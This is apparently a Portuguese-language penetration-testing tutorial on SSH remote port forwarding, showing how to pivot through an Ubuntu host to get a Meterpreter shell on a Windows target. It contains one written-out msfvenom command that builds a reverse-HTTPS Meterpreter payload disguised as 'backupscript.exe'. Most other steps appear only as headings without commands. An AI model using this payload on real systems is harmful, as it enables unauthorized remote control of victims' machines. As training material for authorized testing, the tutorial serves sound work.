Remote/Reverse Port Forwarding with SSH

Como pode ser visto na imagem abaixo, em nosso caso anterior, poderíamos fazer pivot no host Windows por meio do servidor Ubuntu.

  • Criando um Payload do Windows com msfvenom

msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080
  • Configurando e iniciando o multi/handler

  • Transferindo carga útil para o host Pivot

  • Iniciando o servidor Web Python3 no Pivot Host

  • Baixando Payload do Windows Target


Usando SSH -R

  • Após criar o encaminhamento de porta remota SSH, podemos executar o payload do alvo do Windows. Se o payload for executado conforme o esperado e tentar se conectar de volta ao nosso listener, podemos ver os logs do pivot no host do pivot.

  • Se tudo estiver configurado corretamente, receberemos um shell do Meterpreter dinamizado pelo servidor Ubuntu.

Last updated